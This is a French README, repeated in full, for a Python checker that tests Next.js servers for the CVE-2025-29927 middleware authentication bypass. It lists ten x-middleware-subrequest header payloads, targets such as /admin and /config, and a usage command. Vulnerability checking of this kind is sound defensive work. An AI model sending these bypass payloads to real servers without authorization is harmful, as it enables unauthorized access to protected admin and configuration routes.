
Ce script vérifie la vulnérabilité CVE-2025-29927 sur les serveurs Next.js, en testant plusieurs charges dans l'en-tête x-middleware-subrequest pour détecter les accès non autorisés.
CVE-2025-29927 Checker
📌 Introduction
Ce script vérifie la vulnérabilité CVE-2025-29927 dans les serveurs Next.js en testant plusieurs payloads dans l'en-tête x-middleware-subrequest afin de détecter les accès non autorisés.
❓ Qu'est-ce que CVE-2025-29927 ?
CVE-2025-29927 est une vulnérabilité qui permet de contourner les restrictions de sécurité dans Next.js, autorisant l'accès à des routes sensibles sans authentification.
⚙️ Comment fonctionne le script
🔹 1. Importation des bibliothèques
Le script utilise :
🛠️ argparse - pour la gestion des arguments.
🌐 requests - pour envoyer des requêtes HTTP.
⏳ time - pour des pauses entre les tests.
🎨 colorama - pour formater la sortie console avec des couleurs.
🔹 2. Liste des payloads
Le script teste plusieurs payloads dans x-middleware-subrequest, conçus pour contourner les restrictions de sécurité. Exemple :
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Routes sensibles
Le script analyse les réponses à la recherche de chemins tels que :
/admin, /dashboard, /settings, /private, /config
🔹 4. Processus de scan
✅ Affiche une bannière dans la console.✅ Envoie des requêtes HTTP avec différents payloads.✅ Vérifie si le serveur utilise Next.js.✅ Détecte l'accès aux routes sensibles et signale les vulnérabilités.
🔹 5. Gestion des erreurs
Le script gère les exceptions pour éviter les interruptions dues à des échecs de connexion.
🚀 Exemple d'utilisation
Exécutez le script avec :
python script.py -t https://example.com/api/auth
📢 Avertissement
Cet outil est destiné uniquement aux tests éthiques et aux usages autorisés. Toute utilisation non autorisée contre des systèmes tiers est illégale.
===================FRANÇAIS===================
CVE-2025-29927 Checker
📌 Introduction
Ce script vérifie la vulnérabilité CVE-2025-29927 dans les serveurs Next.js, en testant plusieurs payloads dans l'en-tête x-middleware-subrequest pour détecter les accès non autorisés.
❓ Qu'est-ce que CVE-2025-29927 ?
CVE-2025-29927 est une vulnérabilité qui permet de contourner les restrictions de sécurité dans Next.js, autorisant l'accès à des routes sensibles sans authentification.
⚙️ Comment fonctionne le script
🔹 1. Importation des bibliothèques
Le script utilise :
🛠️ argparse - pour la gestion des arguments.
🌐 requests - pour envoyer des requêtes HTTP.
⏳ time - pour des pauses entre les tests.
🎨 colorama - pour formater la sortie console avec des couleurs.
🔹 2. Liste des payloads
Le script teste plusieurs payloads dans x-middleware-subrequest, conçus pour contourner les restrictions de sécurité. Exemple :
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Routes sensibles
Le script analyse les réponses à la recherche de chemins tels que :
/admin, /dashboard, /settings, /private, /config
🔹 4. Processus de scan
✅ Affiche une bannière dans la console.✅ Envoie des requêtes HTTP avec différents payloads.✅ Vérifie si le serveur utilise Next.js.✅ Détecte l'accès aux routes sensibles et signale les vulnérabilités.
🔹 5. Gestion des erreurs
Le script gère les exceptions pour éviter les interruptions dues à des échecs de connexion.
🚀 Exemple d'utilisation
Exécutez le script avec :
python script.py -t https://example.com/api/auth
📢 Avertissement
Cet outil est destiné uniquement aux tests éthiques et aux usages autorisés. Toute utilisation non autorisée contre des systèmes tiers est illégale.